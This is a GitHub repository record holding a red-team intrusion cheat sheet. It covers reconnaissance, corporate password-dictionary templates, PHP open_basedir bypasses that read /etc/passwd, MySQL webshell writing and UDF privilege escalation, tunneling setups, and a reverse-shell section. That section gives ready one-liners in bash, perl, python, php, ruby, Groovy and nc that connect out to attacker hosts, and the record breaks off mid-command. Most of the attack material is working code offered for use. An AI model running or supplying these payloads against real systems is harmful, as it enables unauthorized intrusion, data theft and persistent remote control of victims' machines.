{"id":13844574,"url":"https://github.com/zer0yu/RedTeam_CheetSheets","last_synced_at":"2025-07-11T23:33:47.819Z","repository":{"id":107688098,"uuid":"297952888","full_name":"zer0yu/RedTeam_CheetSheets","owner":"zer0yu","description":"RedTeam参考，修改自Ridter的https://github.com/Ridter/Intranet_Penetration_Tips","archived":false,"fork":false,"pushed_at":"2021-09-16T14:55:23.000Z","size":467,"stargazers_count":89,"open_issues_count":0,"forks_count":22,"subscribers_count":6,"default_branch":"master","last_synced_at":"2025-06-28T23:07:09.758Z","etag":null,"topics":["hacking","redteam","websecurity"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/zer0yu.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2020-09-23T11:49:14.000Z","updated_at":"2025-01-17T12:03:03.000Z","dependencies_parsed_at":"2023-03-13T14:34:08.264Z","dependency_job_id":null,"html_url":"https://github.com/zer0yu/RedTeam_CheetSheets","commit_stats":null,"previous_names":["zer0yu/intranet_penetration_cheetsheets"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/zer0yu/RedTeam_CheetSheets","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zer0yu%2FRedTeam_CheetSheets","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zer0yu%2FRedTeam_CheetSheets/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zer0yu%2FRedTeam_CheetSheets/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zer0yu%2FRedTeam_CheetSheets/manifests","owner_url"
:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/zer0yu","download_url":"https://codeload.github.com/zer0yu/RedTeam_CheetSheets/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zer0yu%2FRedTeam_CheetSheets/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264914571,"owners_count":23682853,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking","redteam","websecurity"],"created_at":"2024-08-04T17:02:46.063Z","updated_at":"2025-07-11T23:33:47.522Z","avatar_url":"https://github.com/zer0yu.png","language":null,"readme":"# Intranet Penetration CheetSheets\n\nModified by: [z3r0yu](https://twitter.com/zeroyu_)\nBlog: http://zeroyu.xyz\n\nTable of Contents\n=================\n\n  * [信息搜集](#信息搜集)\n      * [开源情报信息收集（OSINT）](#开源情报信息收集osint)\n        * [github](#github)\n        * [whois查询/注册人反查/邮箱反查/相关资产](#whois查询注册人反查邮箱反查相关资产)\n        * [google hacking](#google-hacking)\n      * [创建企业密码字典](#创建企业密码字典)\n        * [字典列表](#字典列表)\n        * [密码生成](#密码生成)\n        * [邮箱列表获取](#邮箱列表获取)\n        * [泄露密码查询](#泄露密码查询)\n        * [对企业外部相关信息进行搜集](#对企业外部相关信息进行搜集)\n            * [子域名获取](#子域名获取)\n  * [进入内网](#进入内网)\n      * [基于企业弱账号漏洞](#基于企业弱账号漏洞)\n      * [基于系统漏洞进入](#基于系统漏洞进入)\n      * [网站应用程序渗透](#网站应用程序渗透)\n      * [无线Wi-Fi接入](#无线wi-fi接入)\n  * [隐匿攻击](#隐匿攻击)\n      * [Command and Control](#command-and-control)\n      * [Fronting](#fronting)\n      * [代理](#代理)\n  * [内网跨边界应用](#内网跨边界应用)\n      * [内网跨边界转发](#内网跨边界转发)\n      * [内网跨边界代理穿透](#内网跨边界代理穿透)\n        * [\u003ca 
href=\"https://rootkiter.com/EarthWorm/\" rel=\"nofollow\"\u003eEW\u003c/a\u003e](#ew)\n        * [\u003ca href=\"https://rootkiter.com/Termite/\" rel=\"nofollow\"\u003eTermite\u003c/a\u003e](#termite)\n        * [代理脚本](#代理脚本)\n      * [shell反弹](#shell反弹)\n      * [内网文件的传输和下载](#内网文件的传输和下载)\n      * [搭建 HTTP server](#搭建-http-server)\n  * [内网信息搜集](#内网信息搜集)\n      * [本机信息搜集](#本机信息搜集)\n        * [1. 用户列表](#1用户列表)\n        * [2. 进程列表](#2进程列表)\n        * [3. 服务列表](#3服务列表)\n        * [4. 端口列表](#4端口列表)\n        * [5. 补丁列表](#5补丁列表)\n        * [6. 本机共享](#6本机共享)\n        * [7. 本用户习惯分析](#7本用户习惯分析)\n        * [8. 获取当前用户密码工具](#8获取当前用户密码工具)\n            * [Windows](#windows)\n            * [Linux](#linux)\n      * [扩散信息收集](#扩散信息收集)\n        * [端口扫描](#端口扫描)\n            * [常用端口扫描工具](#常用端口扫描工具)\n        * [网卡信息扫描(开放135端口)](#网卡信息扫描(开放135端口))\n        * [内网拓扑架构分析](#内网拓扑架构分析)\n        * [常见信息收集命令](#常见信息收集命令)\n      * [第三方信息收集](#第三方信息收集)\n  * [权限提升](#权限提升)\n      * [Windows](#windows-1)\n        * [BypassUAC](#bypassuac)\n            * [常用方法](#常用方法)\n            * [常用工具](#常用工具)\n        * [提权](#提权)\n      * [Linux](#linux-1)\n        * [内核溢出提权](#内核溢出提权)\n        * [计划任务](#计划任务)\n        * [SUID](#suid)\n        * [系统服务的错误权限配置漏洞](#系统服务的错误权限配置漏洞)\n        * [不安全的文件/文件夹权限配置](#不安全的文件文件夹权限配置)\n        * [找存储的明文用户名，密码](#找存储的明文用户名密码)\n  * [权限维持](#权限维持)\n      * [系统后门](#系统后门)\n        * [Windows](#windows-2)\n            * [1. 密码记录工具](#1密码记录工具)\n            * [2. 常用的存储Payload位置](#2常用的存储payload位置)\n            * [3. Run/RunOnce Keys](#3runrunonce-keys)\n            * [4. BootExecute Key](#4bootexecute-key)\n            * [5. Userinit Key](#5userinit-key)\n            * [6. Startup Keys](#6startup-keys)\n            * [7. Services](#7services)\n            * [8. Browser Helper Objects](#8browser-helper-objects)\n            * [9. AppInit_DLLs](#9appinit_dlls)\n            * [10. 文件关联](#10文件关联)\n            * [11. 
\u003ca href=\"http://www.liuhaihua.cn/archives/357579.html\" rel=\"nofollow\"\u003ebitsadmin\u003c/a\u003e](#11bitsadmin)\n            * [12. \u003ca href=\"https://evi1cg.me/archives/Powershell_MOF_Backdoor.html\" rel=\"nofollow\"\u003emof \u003c/a\u003e](#12mof-)\n            * [13. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/\" rel=\"nofollow\"\u003ewmi\u003c/a\u003e](#13wmi)\n            * [14. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/\" rel=\"nofollow\"\u003eUserland Persistence With Scheduled Tasks\u003c/a\u003e](#14userland-persistence-with-scheduled-tasks)\n            * [15. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Netsh-persistence/\" rel=\"nofollow\"\u003eNetsh\u003c/a\u003e](#15netsh)\n            * [16. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/渗透测试中的Application-Compatibility-Shims/\" rel=\"nofollow\"\u003eShim\u003c/a\u003e](#16shim)\n            * [17. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/DLL劫持漏洞自动化识别工具Rattler测试/\" rel=\"nofollow\"\u003eDLL劫持\u003c/a\u003e](#17dll劫持)\n            * [18. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/渗透测试中的Application-Verifier(DoubleAgent利用介绍)/\" rel=\"nofollow\"\u003eDoubleAgent \u003c/a\u003e](#18doubleagent-)\n            * [19. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence/\" rel=\"nofollow\"\u003ewaitfor.exe \u003c/a\u003e](#19waitforexe-)\n            * [20. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence/\" rel=\"nofollow\"\u003eAppDomainManager\u003c/a\u003e](#20appdomainmanager)\n            * [21. Office](#21office)\n            * [22. 
\u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-maintain-persistence/\" rel=\"nofollow\"\u003eCLR\u003c/a\u003e](#22clr)\n            * [23. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/\" rel=\"nofollow\"\u003emsdtc\u003c/a\u003e](#23msdtc)\n            * [24. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator/\" rel=\"nofollow\"\u003eHijack CAccPropServicesClass and MMDeviceEnumerato\u003c/a\u003e](#24hijack-caccpropservicesclass-and-mmdeviceenumerato)\n            * [25. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe/\" rel=\"nofollow\"\u003eHijack explorer.exe\u003c/a\u003e](#25hijack-explorerexe)\n            * [26. Windows FAX DLL Injection](#26windows-fax-dll-injection)\n            * [27. 特殊注册表键值](#27特殊注册表键值)\n            * [28. 快捷方式后门](#28快捷方式后门)\n            * [29. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence/\" rel=\"nofollow\"\u003eLogon Scripts\u003c/a\u003e](#29logon-scripts)\n            * [30. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Password-Filter-DLL在渗透测试中的应用/\" rel=\"nofollow\"\u003ePassword Filter DLL\u003c/a\u003e](#30password-filter-dll)\n            * [31. 
\u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/利用BHO实现IE浏览器劫持/\" rel=\"nofollow\"\u003e利用BHO实现IE浏览器劫持\u003c/a\u003e](#31利用bho实现ie浏览器劫持)\n        * [Linux](#linux-2)\n            * [crontab](#crontab)\n            * [硬链接sshd](#硬链接sshd)\n            * [SSH Server wrapper](#ssh-server-wrapper)\n            * [SSH keylogger](#ssh-keylogger)\n            * [Cymothoa_进程注入backdoor](#cymothoa_进程注入backdoor)\n            * [Vegile_进程注入backdoor](#Vegile_进程注入backdoor)\n            * [rootkit](#rootkit)\n            * [Tools](#tools)\n      * [WEB后门](#web后门)\n  * [横向渗透](#横向渗透)\n      * [端口渗透](#端口渗透)\n        * [端口扫描](#端口扫描-1)\n        * [端口爆破](#端口爆破)\n        * [端口弱口令](#端口弱口令)\n        * [端口溢出](#端口溢出)\n        * [常见的默认端口](#常见的默认端口)\n            * [1. web类(web漏洞/敏感目录)](#1web类web漏洞敏感目录)\n            * [2. 数据库类(扫描弱口令)](#2数据库类扫描弱口令)\n            * [3. 特殊服务类(未授权/命令执行类/漏洞)](#3特殊服务类未授权命令执行类漏洞)\n            * [4. 常用端口类(扫描弱口令/端口爆破)](#4常用端口类扫描弱口令端口爆破)\n            * [5. 端口合计所对应的服务](#5端口合计所对应的服务)\n      * [域渗透](#域渗透)\n        * [信息搜集](#信息搜集-1)\n            * [powerview.ps1](#powerviewps1)\n            * [BloodHound](#bloodhound)\n            * [获取域内DNS信息](#获取域内dns信息)\n        * [获取域控的方法](#获取域控的方法)\n            * [SYSVOL](#sysvol)\n            * [MS14-068 Kerberos](#ms14-068-kerberos)\n            * [SPN扫描](#spn扫描)\n            * [Kerberos的黄金门票](#kerberos的黄金门票)\n            * [Kerberos的银票务](#kerberos的银票务)\n            * [域服务账号破解](#域服务账号破解)\n            * [凭证盗窃](#凭证盗窃)\n            * [NTLM relay](#ntlm-relay)\n            * [Kerberos委派](#kerberos委派)\n            * [地址解析协议](#地址解析协议)\n        * [获取AD哈希](#获取ad哈希)\n        * [AD持久化](#ad持久化)\n            * [活动目录持久性技巧](#活动目录持久性技巧)\n            * [Security Support Provider](#security-support-provider)\n            * [\u003ca href=\"https://adsecurity.org/?p=1772\" rel=\"nofollow\"\u003eSID History\u003c/a\u003e](#sid-history)\n            * [\u003ca href=\"https://adsecurity.org/?p=1906\" rel=\"nofollow\"\u003eAdminSDHolder＆SDProp 
\u003c/a\u003e](#adminsdholdersdprop-)\n            * [组策略](#组策略)\n            * [Hook PasswordChangeNotify](#hook-passwordchangenotify)\n            * [Kerberoasting后门](#kerberoasting后门)\n            * [AdminSDHolder](#adminsdholder)\n            * [Delegation](#delegation)\n        * [其他](#其他)\n            * [域内主机提权](#域内主机提权)\n            * [Exchange的利用](#exchange的利用)\n        * [TIPS](#tips)\n        * [相关工具](#相关工具)\n      * [在远程系统上执行程序](#在远程系统上执行程序)\n      * [IOT相关](#iot相关)\n      * [中间人](#中间人)\n      * [规避杀软及检测](#规避杀软及检测)\n        * [Bypass Applocker](#bypass-applocker)\n        * [bypassAV](#bypassav)\n  * [痕迹清理](#痕迹清理)\n      * [\u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/渗透技巧-Windows日志的删除与绕过/\" rel=\"nofollow\"\u003eWindows日志清除\u003c/a\u003e](#windows日志清除)\n      * [破坏Windows日志记录功能](#破坏windows日志记录功能)\n      * [msf](#msf)\n      * [3389登陆记录清除](#3389登陆记录清除)\n\n\n## Information Gathering \n### Open-Source Intelligence (OSINT) \n#### GitHub \n* Github_Nuggests (crawls GitHub for sensitive information leaked in files): https://github.com/az0ne/Github_Nuggests\n* GSIL (near-real-time (within 15 minutes) discovery of information leaked on GitHub): https://github.com/FeeiCN/GSIL\n* x-patrol (from the Xiaomi security team): https://github.com/MiSecurity/x-patrol\n\n#### WHOIS lookup / reverse registrant lookup / reverse e-mail lookup / related assets\n\n* 站长之家 (chinaz WHOIS): http://whois.chinaz.com/?DomainName=target.com&ws=\n* 爱站 (aizhan WHOIS): https://whois.aizhan.com/target.com/\n* 微步在线 (ThreatBook): https://x.threatbook.cn/\n* Reverse IP lookup: https://dns.aizhan.com/\n* 天眼查 (Tianyancha, company registry data): https://www.tianyancha.com/\n* 虎妈查 (whomx): http://www.whomx.com/\n* Historical vulnerability lookup:\n    * Online: http://wy.zone.ci/\n    * Self-hosted: https://github.com/hanc00l/wooyun_publi/\n\n#### Google hacking \n\n### Building a Company-Specific Password Dictionary \n#### Dictionary lists \n* passwordlist: https://github.com/lavalamp-/password-lists\n* 猪猪侠's dictionary: https://pan.baidu.com/s/1dFJyedz\n* [Blasting_dictionary](https://github.com/rootphantomer/Blasting_dictionary) (shared collection of dictionaries: weak passwords, common passwords, directory, database, editor and admin-panel brute-forcing lists, etc.) \n* 
For a specific target organization, focus on building a dictionary from the company name and its domain names; in the templates below %user% stands for the account name and %pwd% for a base word (company name, abbreviation, product name)\n```\n['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!']\n```\n\n#### Password generation \n\n* GenpAss (weak-password generator tuned to Chinese naming habits): https://github.com/RicterZ/genpAss/\n* passmaker (password dictionary generator with user-defined rules): https://github.com/bit4woo/passmaker\n* pydictor (powerful password generator): https://github.com/LandGrey/pydictor\n* BaiLu social-engineering dictionary generator: https://github.com/HongLuDianXue/BaiLu-SED-Tool\n\n#### Collecting e-mail address lists  \n\n* theHarvester: https://github.com/laramies/theHarvester\n* Once one mailbox is compromised, export its address book \n* LinkedInt: https://github.com/mdsecactivebreach/LinkedInt\n* Mailget: https://github.com/Ridter/Mailget\n\n#### Leaked password lookup\n* ghostproject: https://ghostproject.fr/\n* pwndb: https://pwndb2am4tzkvold.onion.to/\n\n#### Cracking hashed passwords\n* pwcrack-framework (guesses the likely hash/encoding type automatically and cracks it): https://github.com/L-codes/pwcrack-framework\n\n#### Collecting the organization's external footprint\n##### Subdomain enumeration \n* Layer子域名挖掘机 4.2 commemorative edition (Layer subdomain miner) \n* subDomainsBrute: https://github.com/lijiejie/subDomainsBrute\n* wydomain: https://github.com/ring04h/wydomain\n* Sublist3r: https://github.com/aboul3la/Sublist3r\n* site:target.com on https://www.google.com\n* GitHub code repositories \n* Capture traffic and inspect requests/responses (redirects, file uploads, app/API endpoints, etc.) \n* Online lookup sites such as 站长帮手 links \n* DNS zone transfer (AXFR) misconfiguration \n* OneForAll: https://github.com/shmilylty/OneForAll\n\nLinux\n```\ndig @ns.example.com example.com AXFR \n```\nWindows\n```\nnslookup -type=ns xxx.yyy.cn #find the authoritative DNS servers for the domain\nnslookup #enter nslookup interactive mode\nserver dns.domain.com #select the DNS server to query\nls xxx.yyy.cn #list the zone (only works if that server allows zone transfers)\n```\n\n* GetDomainsBySSL.py: https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&type=note#/\n* censys.io certificates: https://censys.io/certificates?q=target.com\n* crt.sh certificate search: https://crt.sh/?q=%25.target.com\n* shodan: https://www.shodan.io/\n* zoomeye 
:https://www.zoomeye.org/\n* fofa: https://fofa.so/\n* censys: https://censys.io/\n* dnsdb.io: https://dnsdb.io/zh-cn/search?q=target.com\n* api.hackertarget.com: http://api.hackertarget.com/reversedns/?q=target.com\n* community.riskiq.com: https://community.riskiq.com/Search/target.com\n* subdomain3: https://github.com/yanxiu0614/subdomain3\n* FuzzDomain: https://github.com/Chora10/FuzzDomain\n* dnsdumpster.com: https://dnsdumpster.com/\n* phpinfo.me: https://phpinfo.me/domain/\n* Open DNS data API: https://dns.bufferover.run/dns?q=baidu.com\n* pipl.com: https://pipl.com/\n* Source Code Search Engine: https://publicwww.com/\n* Hunter (finds e-mail addresses for a domain): https://hunter.io/\n* searchcode: https://searchcode.com/\n* greynoise: https://greynoise.io/\n\n## Breaking In from the Internet\n\n### Bypassing open_basedir\n\n1. ini_set bypass\n\n```\n<?php\n// open_basedir can only be narrowed at runtime, but a relative value is\n// resolved against the current working directory: set it to '..', climb out\n// with chdir('..') until cwd is '/', at which point '/' is inside the\n// allowed path and can be set.\nmkdir('img');\nchdir('img');\nini_set('open_basedir','..');\nchdir('..');\nchdir('..');\nchdir('..');\nchdir('..');\nchdir('..');\nchdir('..');\nchdir('..');\nini_set('open_basedir','/');\n```\n\n2. Bypass via system command execution (open_basedir only restricts PHP's own file functions, not child processes):\n\n   system(\"cd /;ls\")\n\n3. glob:// stream wrapper bypass (directory listing only; file contents still cannot be read this way)\n\n   ```\n   <?php\n   // iterate over every *.php file in ext/spl/examples/\n   // and print each file name and size\n   $it = new DirectoryIterator(\"glob://ext/spl/examples/*.php\");\n   foreach($it as $f) {\n       printf(\"%s: %.1FK\\n\", $f->getFilename(), $f->getSize()/1024);\n   }\n   ?>\n   \n   <?php\n   $a = new DirectoryIterator(\"glob:///*\");\n   foreach($a as $f){\n       echo($f->__toString().'<br>');\n   }\n   ?>\n   \n   <?php\n   var_dump(scandir('glob:///*'));\n   ?>\n   \n   <?php\n   if ( $b = opendir('glob:///*') ) {\n       while ( ($file = readdir($b)) !== false ) {\n           echo $file.\"<br>\";\n       }\n       closedir($b);\n   }\n   ?>\n   ```\n\n4. 
symlink bypass\n\n   symlink() creates a symbolic link named link that points at an existing target.\n\n   ```\n   // read /etc/passwd\n   <?php\n   mkdir(\"a\");\n   chdir(\"a\");\n   mkdir(\"b\");\n   chdir(\"b\");\n   mkdir(\"c\");\n   chdir(\"c\");\n   mkdir(\"d\");\n   chdir(\"d\");\n   chdir(\"..\");\n   chdir(\"..\");\n   chdir(\"..\");\n   chdir(\"..\");\n   // while Von -> a/b/c/d, the four '..' in the second link resolve back\n   // inside the web root, so the open_basedir check on symlink() passes\n   symlink(\"a/b/c/d\",\"Von\");\n   symlink(\"Von/../../../../etc/passwd\",\"exp\");\n   // replace the link with a real directory: exp now resolves to\n   // <cwd>/../../../../etc/passwd, i.e. /etc/passwd (four '..' assume the\n   // web root is at most four levels deep; add more if it is deeper)\n   unlink(\"Von\");\n   mkdir(\"Von\");\n   system('cat exp');\n   ```\n\n5. A few other, less practical [methods](https://www.v0n.top/2020/07/10/open_basedir%E7%BB%95%E8%BF%87/)\n\n### Bypassing disable_functions\n\n1. AntSword (蚁剑) plugins\n\n2. https://mp.weixin.qq.com/s?__biz=MzU3ODc2NTg1OA==&mid=2247485666&idx=1&sn=71a0cce05637edd488cb9cccb3967504\n\n   Upload the PHP script and pass the command as a parameter; it runs without returning output, and the shell it calls back with is sometimes one-shot (the connection drops before any command can be run). The workaround is to use Stowaway as the callback.\n\nReferences: https://blog.z3ratu1.cn/%E4%BB%8EByteCTF%E5%88%B0bypass_disable_function.html\n\nhttps://www.cnblogs.com/sakura521/p/15055907.html\n\n\n\n### Getting a Shell from MySQL\n\n```\n# Write a file (only works when secure_file_priv is empty or covers the target directory)\nshow global variables like '%secure_file_priv%';\nselect '<?php phpinfo(); ?>' into outfile '/var/www/html/info.php';\nsqlmap -u \"http://x.x.x.x/?id=x\" --file-write=\"/Users/guang/Desktop/shell.php\" --file-dest=\"/var/www/html/test/shell.php\"\n\n# Shell via the general query log (needs SUPER/SYSTEM_VARIABLES_ADMIN; the log path must be writable by mysqld and served by the web server)\nSHOW VARIABLES LIKE 'general%';\n# redirect the log file\nset global general_log = \"ON\";\nset global general_log_file='/var/www/html/info.php';\nselect '<?php phpinfo();?>';\n\n# With a known username, repeated wrong-password logins occasionally succeed on builds affected by the old MySQL memcmp authentication bypass\nfor i in `seq 1 1000`; do mysql -uroot -pwrong -h 127.0.0.1 -P3306 ; done\n\n# UDF privilege escalation\n# shared library download: https://sqlsec.lanzoux.com/i4b7jhyhwid\n# find the plugin directory\nshow variables like '%plugin%';\nselect @@basedir;\n# if the plugin directory does not exist, create it (NTFS alternate data stream trick, Windows only):\nselect 233 into dumpfile 'C:\\\\PhpStudy\\\\PHPTutorial\\\\MySQL\\\\lib\\\\plugin::$index_allocation';\n# write the shared library into plugin_dir\nsqlmap -u \"http://localhost:30008/\" --data=\"id=1\" --file-write=\"/Users/sec/Desktop/lib_mysqludf_sys_64.so\" --file-dest=\"/usr/lib/mysql/plugin/udf.so\"\n# create the function; SONAME must match the file written above ('udf.so' on Linux, 'udf.dll' on Windows)\nCREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';\nselect 
* from mysql.func;\nselect sys_eval('whoami');\ndrop function sys_eval;\n```\n\n[t00ls UDF.PHP](https://github.com/echohun/tools/blob/master/大马/udf.php)   web script for one-click UDF deployment\n\n[Reference](https://www.sqlsec.com/2020/11/mysql.html#toc-heading-31)\n\n\n\n\n\n### Domain Fronting\n\n* [Domain Fronting ](https://evi1cg.me/archives/Domain_Fronting.html)\n* [Tor_Fronting.](https://evi1cg.me/archives/Tor_Fronting.html)\n### Setting Up Proxies\n* VPN \n\n* shadowsocks: https://github.com/shadowsocks\n\n* HTTP: http://cn-proxy.com/\n\n* Tor\n\n* [Venom](https://github.com/Dliv3/Venom) -- does not support UDP traffic\n\n* [Stowaway](https://github.com/ph4ntonn/Stowaway) -- supports UDP traffic, stable\n\n  ```\n  admin: ./stowaway_admin -l 9999\n  agent: ./stowaway_agent -c 127.0.0.1:9999 --reconnect 10\n  ```\n\n* [nps](https://github.com/ehang-io/nps)\n\n* [frp](https://github.com/fatedier/frp)\n\n  ```\n  VPS (frps.ini):\n  [common]\n  bind_addr = 0.0.0.0\n  bind_port = 7000\n  token = test\n  # choose your own port and token; they only need to match on client and server\n  \n  web dashboard\n  # dashboard_addr = 0.0.0.0 \n  # the dashboard only starts if dashboard_port is set\n  dashboard_port = 7500\n  # dashboard credentials\n  dashboard_user = admin1\n  dashboard_pwd = hadaessd@@@!!@@#\n  # ports clients may bind on the server; every remote_port in frpc.ini must fall inside this range\n  allow_ports = 40000-50000\n  \n  start the server:\n  nohup ./frps -c frps.ini &\n  \n  \n  Target host (frpc.ini):\n  # edit frpc.ini as below and upload it together with the frpc binary\n  # chmod +x frpc (preferably rename the binary, e.g. to daemon)\n  [common]\n  server_addr = xxx.xxx.xx.xxx\n  # port and token must match the server\n  server_port = 7000\n  token = test\n  tls_enable = true\n  pool_count = 5\n  \n  # HTTP proxy (remote_port must be inside the server's allow_ports range)\n  [plugin_http_proxy]\n  type = tcp\n  remote_port = 40001\n  plugin = http_proxy\n  # the proxy is exposed on the VPS to the whole internet; enable authentication\n  # plugin_http_user = abc\n  # plugin_http_passwd = abc\n  \n  # SOCKS5 proxy\n  [plugin_socks5]\n  type = tcp\n  remote_port = 40002\n  plugin = socks5\n  # plugin_user = abc\n  # plugin_passwd = abc\n  use_encryption = true\n  use_compression = true\n  ```\n\n- [frpModify](https://github.com/uknowsec/frpModify) -> patched to support domain fronting and self-deletion\n\n* proxychains `proxychains4 -q bash #route the whole terminal session through the proxy`\n\n* Neo-reGeorg: https://github.com/L-codes/Neo-reGeorg\n\n  
```\n  python3 neoreg.py -k password -u http://xx/tunnel.php\n  ```\n\n- [chisel](https://github.com/jpillora/chisel) -- write-up: [Red Team: Using SharpChisel to exfil internal network](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)\n\n- [SharpChisel](https://github.com/shantanu561993/SharpChisel) -- C# wrapper around chisel\n\n- [mssqlproxy](https://github.com/blackarrowsec/mssqlproxy) -- tunnels traffic through CLR execution in MSSQL (for targets that expose only the MSSQL port)\n\n- [ligolo](https://github.com/FunnyWolf/ligolo) -- lightweight reverse SOCKS5 proxy; all traffic is TLS-encrypted\n\n* [NC port forwarding](https://blog.csdn.net/l_f0rm4t3d/article/details/24004555) \n\n* [LCX port forwarding](http://blog.chinaunix.net/uid-53401-id-4407931.html)\n\n* [nps](https://github.com/cnlh/nps) -> quite stable in the author's experience\n\n* [Tunna](https://github.com/SECFORCE/Tunna)\n\n* [Reduh](https://github.com/sensepost/reDuh)\n\n* [pystinger](https://github.com/FunnyWolf/pystinger) -> 毒刺 (pystinger) provides a SOCKS4 proxy and port mapping into the internal network through a webshell\n\n* [EW](https://rootkiter.com/EarthWorm/) \n\n    Forward SOCKS v5 server:\n\n    ```\n    ./ew -s ssocksd -l 1080\n    ```\n\n     Reverse SOCKS v5 server:\n    a) On host A, which has a public IP, run:\n\n    ```\n    $ ./ew -s rcsocks -l 1080 -e 8888 \n    \n    ```\n\n    b) On target host B, start the SOCKS v5 service and connect back to port 8888 on the public host:\n\n    ```\n    $ ./ew -s rssocks -d 1.1.1.1 -e 8888 \n    ```\n\n    Multi-level chaining\n\n    ```\n    $ ./ew -s lcx_listen -l 1080 -e 8888\n    $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999\n    $ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999\n    ```\n\n    Using lcx_tran\n\n    ```\n    $ ./ew -s ssocksd -l 9999\n    $ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999\n    ```\n\n    Using lcx_listen and 
lcx_slave\n\n    ```\n    $ ./ew -s lcx_listen -l 1080 -e 8888\n    $ ./ew -s ssocksd -l 9999\n    $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999\n    ```\n\n    A local three-level chaining SOCKS test case for reference\n\n    ```\n    $ ./ew -s rcsocks -l 1080 -e 8888\n    $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999\n    $ ./ew -s lcx_listen -l 9999 -e 7777\n    $ ./ew -s rssocks -d 127.0.0.1 -e 7777\n    ```\n\n- [Termite](https://rootkiter.com/Termite/)   usage: https://rootkiter.com/Termite/README.txt \n\n\n### Reverse Shells \nbash  \n```\nbash -i >& /dev/tcp/10.0.0.1/8080 0>&1\n```\nperl \n```\nperl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n```\npython \n```\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n```\nphp \n```\nphp -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n```\nruby \n```\nruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'\n```\njava (Groovy syntax, e.g. for a Jenkins script console)\n```\nr = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()\n```\nnc \n```\n#with -e (only netcat builds that support it)\nnc -e /bin/sh 223.8.200.234 1234 \n```\n```\n#without -e: a named pipe carries the shell's input\nmknod /tmp/backpipe p\n/bin/sh 0</tmp/backpipe | nc attackerip 